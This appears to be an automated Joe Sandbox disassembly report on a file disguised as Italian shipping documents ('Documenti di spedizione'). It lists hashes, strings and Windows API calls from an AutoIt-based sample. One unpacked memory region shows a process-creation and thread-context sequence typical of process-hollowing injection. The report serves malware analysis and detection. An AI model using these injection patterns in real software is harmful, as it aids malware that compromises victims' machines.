                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                        • String ID: TaskbarCreated
                        • API String ID: 129472671-2362178303
                        • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                        • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                        • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                        • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

                        APIs
                        • _malloc.LIBCMT ref: 004115F1
                          • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                          • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                          • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                        • std::exception::exception.LIBCMT ref: 00411626
                        • std::exception::exception.LIBCMT ref: 00411640
                        • __CxxThrowException@8.LIBCMT ref: 00411651
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                        • String ID: ,*H$4*H$@fI
                        • API String ID: 615853336-1459471987
                        • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                        • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                        • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                        • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D

                        APIs
                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 041716D1
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 041718F7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1745600586.000000000416F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0416F000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_416f000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: CreateFileFreeVirtual
                        • String ID:
                        • API String ID: 204039940-0
                        • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                        • Instruction ID: 333c82df5af31f4f0be7bfc334d9607cb26e6bcfd66cfa2a257a1ee244622c75
                        • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                        • Instruction Fuzzy Hash: 57A10974E40209EBDB14CFA4C994BEEBBB5FF48304F208599E501BB380D779AA41CB94

                        APIs
                        • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                        • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                        • _wcsncpy.LIBCMT ref: 004102ED
                        • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                        • _wcsncpy.LIBCMT ref: 00410340
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                        • String ID: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe
                        • API String ID: 3170942423-4007385573
                        • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                        • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                        • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                        • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4

                        APIs
                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                        • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: QueryValue$CloseOpen
                        • String ID: Include$Software\AutoIt v3\AutoIt
                        • API String ID: 1586453840-614718249
                        • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                        • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                        • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                        • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768

                        APIs
                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                        • ShowWindow.USER32(?,00000000), ref: 004105E4
                        • ShowWindow.USER32(?,00000000), ref: 004105EE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Window$CreateShow
                        • String ID: AutoIt v3$edit
                        • API String ID: 1584632944-3779509399
                        • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                        • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                        • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                        • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                        APIs
                          • Part of subcall function 041712B0: Sleep.KERNELBASE(000001F4), ref: 041712C1
                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 041714EE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1745600586.000000000416F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0416F000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_416f000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: CreateFileSleep
                        • String ID: 1ZSE23N7L85REHSCPIYG0EV3B6
                        • API String ID: 2694422964-4122735209
                        • Opcode ID: f31ffd3c437ed063efcf0e105f079c6686eb2210787c29c8662d6fcdfb45ab26
                        • Instruction ID: 4701e390d0bc2f5dafd01a3b1af59859bda72ea73bed3a09449706b0fccbfc90
                        • Opcode Fuzzy Hash: f31ffd3c437ed063efcf0e105f079c6686eb2210787c29c8662d6fcdfb45ab26
                        • Instruction Fuzzy Hash: F251A131D04388EAEF12CBE4C854BDEBB79AF15304F044189E2497B2C1D7B91B48CBA5
                        APIs
                        • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                        • _wcsncpy.LIBCMT ref: 00401C41
                        • _wcscpy.LIBCMT ref: 00401C5D
                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                        • String ID: Line:
                        • API String ID: 1874344091-1585850449
                        • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                        • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                        • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                        • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                        APIs
                        • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                        • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                        • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                        • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Close$OpenQueryValue
                        • String ID: Control Panel\Mouse
                        • API String ID: 1607946009-824357125
                        • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                        • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                        • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                        • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                        APIs
                        • CreateProcessW.KERNELBASE(?,00000000), ref: 04170A6B
                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04170B01
                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04170B23
                        Memory Dump Source
                        • Source File: 00000000.00000002.1745600586.000000000416F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0416F000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_416f000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                        • String ID:
                        • API String ID: 2438371351-0
                        • Opcode ID: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                        • Instruction ID: 887e5b755dc16258ae0238b99a8f01c14f1b715cf8199885113eb81fcf78362d
                        • Opcode Fuzzy Hash: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                        • Instruction Fuzzy Hash: AF62FC30A14658DBEB24CFA4C890BDEB776EF58300F1091A9D10DEB394E775AE81CB59
                        APIs
                          • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                        • _free.LIBCMT ref: 004295A0
                          • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                          • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                          • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                          • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                          • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                          • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                        • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe
                        • API String ID: 3938964917-212169066
                        • Opcode ID: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                        • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                        • Opcode Fuzzy Hash: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                        • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: _memmove
                        • String ID: Error:
                        • API String ID: 4104443479-232661952
                        • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                        • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                        • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                        • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                        APIs
                        • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                          • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe,0040F545,C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe,004A90E8,C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe,?,0040F545), ref: 0041013C
                          • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                          • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                          • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                          • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                          • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                          • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                        • String ID: X$pWH
                        • API String ID: 85490731-941433119
                        APIs
                        • _wcslen.LIBCMT ref: 00401B11
                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                        • _memmove.LIBCMT ref: 00401B57
                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                        • String ID: @EXITCODE
                        • API String ID: 2734553683-3436989551
                        Strings
                        • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                        • C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe, xrefs: 00410107
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: _strcat
                        • String ID: >>>AUTOIT NO CMDEXECUTE<<<$C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe
                        • API String ID: 1765576173-3103797825
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: __filbuf__getptd_noexit__read_memcpy_s
                        • String ID:
                        • API String ID: 1794320848-0
                        APIs
                        • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                        • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Process$CurrentTerminate
                        • String ID:
                        • API String ID: 2429186680-0
                        APIs
                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: IconNotifyShell_
                        • String ID:
                        • API String ID: 1144537725-0
                        APIs
                        • _malloc.LIBCMT ref: 0043214B
                          • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                          • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                          • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                        • _malloc.LIBCMT ref: 0043215D
                        • _malloc.LIBCMT ref: 0043216F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: _malloc$AllocateHeap
                        • String ID:
                        • API String ID: 680241177-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: ClearVariant
                        • String ID:
                        • API String ID: 1473721057-0
                        APIs
                        • __wsplitpath.LIBCMT ref: 004678F7
                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                        • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: ErrorLast__wsplitpath_malloc
                        • String ID:
                        • API String ID: 4163294574-0
                        APIs
                          • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                          • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                          • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                        • _strcat.LIBCMT ref: 0040F786
                          • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                          • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                        • String ID:
                        • API String ID: 3199840319-0
                        APIs
                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                        • FreeLibrary.KERNEL32(?), ref: 0040D78E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: FreeInfoLibraryParametersSystem
                        • String ID:
                        • API String ID: 3403648963-0
                        APIs
                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                        • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        APIs
                          • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                        • __lock_file.LIBCMT ref: 00414A8D
                          • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                        • __fclose_nolock.LIBCMT ref: 00414A98
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                        • String ID:
                        • API String ID: 2800547568-0
                        APIs
                        • __lock_file.LIBCMT ref: 00415012
                        • __ftell_nolock.LIBCMT ref: 0041501F
                          • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: __ftell_nolock__getptd_noexit__lock_file
                        • String ID:
                        • API String ID: 2999321469-0
                        APIs
                        • CreateProcessW.KERNELBASE(?,00000000), ref: 04170A6B
                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04170B01
                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04170B23
                        Memory Dump Source
                        • Source File: 00000000.00000002.1745600586.000000000416F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0416F000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_416f000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                        • String ID:
                        • API String ID: 2438371351-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: _memmove
                        • String ID:
                        • API String ID: 4104443479-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: _memmove
                        • String ID:
                        • API String ID: 4104443479-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: ProtectVirtual
                        • String ID:
                        • API String ID: 544645111-0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: __lock_file
                        • String ID:
                        • API String ID: 3031932315-0
                        APIs
                        • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: FileWrite
                        • String ID:
                        • API String ID: 3934441357-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: __wfsopen
                        • String ID:
                        • API String ID: 197181222-0
                        APIs
                        • CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: CloseHandle
                        • String ID:
                        • API String ID: 2962429428-0
                        APIs
                        • Sleep.KERNELBASE(000001F4), ref: 041712C1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1745600586.000000000416F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0416F000, based on PE: false
                        Similarity
                        • API ID: Sleep
                        • String ID:
                        • API String ID: 3472027048-0
                        APIs
                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                        • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                        • GetKeyState.USER32(00000011), ref: 0047C92D
                        • GetKeyState.USER32(00000009), ref: 0047C936
                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                        • GetKeyState.USER32(00000010), ref: 0047C953
                        • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                        • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                        • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                        • _wcsncpy.LIBCMT ref: 0047CA29
                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                        • SendMessageW.USER32 ref: 0047CA7F
                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                        • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                        • ImageList_SetDragCursorImage.COMCTL32(00AA31D0,00000000,00000000,00000000), ref: 0047CB9B
                        • ImageList_BeginDrag.COMCTL32(00AA31D0,00000000,000000F8,000000F0), ref: 0047CBAC
                        • SetCapture.USER32(?), ref: 0047CBB6
                        • ClientToScreen.USER32(?,?), ref: 0047CC17
                        • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                        • ReleaseCapture.USER32 ref: 0047CC3A
                        • GetCursorPos.USER32(?), ref: 0047CC72
                        • ScreenToClient.USER32(?,?), ref: 0047CC80
                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                        • SendMessageW.USER32 ref: 0047CD12
                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                        • SendMessageW.USER32 ref: 0047CD80
